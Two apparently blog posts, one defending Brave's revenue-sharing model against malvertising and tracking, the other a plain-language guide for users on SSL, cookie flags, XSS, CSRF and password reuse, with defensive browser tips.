Brave: Because It’s The Best Middle Available

I’m no different than a large portion of web users who are looking to read content and stay safe: I use one or more ad blockers. Is this stealing website content? No. I’d be happy to be served ads is they didn’t have such a bad track record in terms of security and privacy.

Privacy

Many people are still ignorant to what information they are giving up to online advertisers. In a 2013 post by VentureBeat they noted:

Advertisers and the tracking companies they employee are able to gather all sorts of information about you, such as the websites you frequent and what kind of products you’re interested — and even some even scarier stuff like political views, health problems, and personal finances.

Over time the picture you provide to these private companies becomes clearer and clearer. Of course, you may not care if companies know you like chocolate chip cookies but you may not want them to know more personal things or, worse, be able to extrapolate things about you that you haven’t even unknowingly shared … not to mention government use for predictive modeling.

Malvertising

Privacy is important but this is the bigger problem in my opinion. Malvertising has proven a successful vector to infect users machines with malware. If you are interested in a time line of large malvertising events GeoEdge has a nice post. A quick summary of heavy hitters who have inadvertently exposed their readers to threats include The New York Times, eBay, LA Times, Spotify, Answers.com, Huffinton Post, MSN, BBC, AOL and NFL. Of course, there are many more but that list should be enough to get anyone’s attention.

Options

So what are valid options to protect personal privacy and security on the web?

Ignore Internet Content

This is the best option but it’s very unlikely. Everyone loses with this as content providers get nothing from their ads and readers don’t get any news.

Go To “Safe” Sources

Another good option, but about as unlikely as the first. It takes work to find out the sites that are not tracking or injecting third party advertising. It also assumes safe sources are always safe but the web is a constantly evolving place and a site may be totally different upon two visits.

Run an Ad Blocker

This is the most common solution today. It blocks as many ads and third party cookies as it can and generally keeps users safe. It’s not a perfect solution as the content providers miss getting any ad clicks/impressions but the reader gets a much safer (and faster) experience.

Some sites actively block ad blockers. When I come across these sites who nicely ask me to unblock their ads I head over to google and find another source for the same story. I don’t think I’m alone in doing that.

Use (something like) Brave That Shares Ad Revenue

This is a newer thing and the actual reason  I wanted to write this post. Brave seems to be a good middle ground which attempts to keep users safe while still providing money back to content providers. In some ways Brave is acting like a arbitrator to let everyone get something out of the deal. Users get content, creators get money. Yeah Brave (and users) get a cut to but that’s not so bad (though I’d be fine with not getting a cut at all as a user).

Here is the flows for revenue from Brave:

brave_infographic_large

852764

Unfortunately, the NAA  didn’t quite grasp the above idea and has called to Brave to stop. Surprise, at least one of the companies who signed the letter has put users at risk via malvertising on multiple occasions.

Brave has posted a rebuttal in an attempt to help NAA understand the business model and why it’s not illegal. Hopefully logic will triumph over emotion and posturing.

My Hope

My hope is that users will jump on to the idea that Brave provides (whether they use Brave or not) and that the NAA will understand that it is a business model where everyone wins, even their readers.

Basic Web Security For The Average User

The Web has been around long enough that Web applications are a part of most everyone’s daily life. Even when a user is on a mobile device they could be interacting with Web services. Sadly there are still many applications and services out there which are lacking what should be the minimum security. Luckily there are some work around users can do to try and protect themselves when applications have less than stellar security practices.

Secure Socket Layer (SSL)

What is it?

SSL keeps the Web traffic between you and the originating server encrypted meaning its harder for someone else to see the data while it is in transit. If SSL is not in use the the Web traffic is viewable by anyone on the wire.

Can I increase my safety?

The best defense is diligence. Whenever you are going to be entering data, login or after you have logged in it’s best to make sure you see ‘https:’ at the start of the url.

For Firefox and Chrome users the EFF provides an extension called HTTPSEverywhere which attempts to keep your browsing over SSL where possible.

Cookie Flags

What is it?

Cookies are utilized to help identify and store small bits of information on the client side (your browser). Over the years there has been a few flags added to cookies that help keep them from getting to the wrong people as easily. These flags are Secure and HttpOnly. Secure tells the browser that it should only pass the cookie to the server if the connection is using SSL. If it isn’t using ng SSL the cookie does not get sent with the request. HttpOnly keeps the cookie out of the hands of javascript only giving it back to the originating server directly over HTTP/HTTPS requests.

Can I increase my safety?

Right now I’m not aware of any extensions which force cookies to be HttpOnly on the browser side. If you are aware of a good mitigation please comment.

Cross Site Scripting (XSS)

What is it?

OWASP defines XSS like so:

Cross-Site Scripting attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. Cross-site scripting (XSS) attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user in the output it generates without validating or encoding it.

(Source)

Can I increase my safety?

By installing NoScript or something similar and utilizing Google Safe Browsing you can lessen the chance of successful XSS attacks but it is far from a silver bullet. There is work being done to to attempt to make XSS attacks much harder but it’s not currently in use.

Cross Site Request Forgery

What is it?

Cross site request forgeries happen when a browser on one page makes a request to a different site to attempt to do something on behalf of the user. There are many cases where this vulnerability is used by developers as functionality but that doesn’t make it any less dangerous.

Can I increase my safety?

Wikipedia has a good page on the subject:

Browser extensions such as RequestPolicy (for Mozilla Firefox) can prevent CSRF by providing a default-deny policy for cross-site requests. However, this can significantly interfere with the normal operation of many websites. The CsFire extension (also for Firefox) can mitigate the impact of CSRF with less impact on normal browsing, by removing authentication information from cross-site requests. The NoScript extension mitigates CSRF threats by distinguishing trusted from untrusted sites, and removing payloads from POST requests sent by untrusted sites to trusted ones.

(Source)

Password Hashing

What is it?

When an application stores passwords it should do so in a way that it doesn’t actually know the password you’ve entered. It may sound odd but it’s pretty trivial to do this for application developers. Yet sometimes they forget to implement this hashing (or the application is ancient and never was updated to do this).

Can I increase my safety?

The best defense a user can do to protect against disclosure is to use different passwords for each site. Understandably this can sound scary: people feel like they have to remember too many passwords already. Thankfully there are applications which can help generate and, store and remember these passwords and let you remember just one. Here are a few popular choices:

External References

What is it?

It’s very common for Web applications to include javascript, images or css from other locations. The reason for this is either to increase performance by using the browser’s cache, utilization of a content delivery system, including ads/analytics or, in some cases, laziness. The problem for the user comes when the remote content becomes unsafe or the content acts in ways the user is not OK with.

It can also cause problems for the application including the content. For more information see my previous post over trusting others to host your content.

Can I increase my safety?

Being that, in most cases, the external references are required for the application to work it is quite hard to fully add protection in the browser but there are still some things that can help.

One more thing…

While not specifically related to the bare minimum of remote web application security it’s important to keep your browser and extensions/plugins updated with the latest patches and supported versions. This can help protect against sites which are hosting browser based exploits for one reason or another (of course, don’t purposely go visit such a site!). For plugins, Mozilla provides a great plugin check page which seems to work for Chrome to some degree as well. Go check your versions!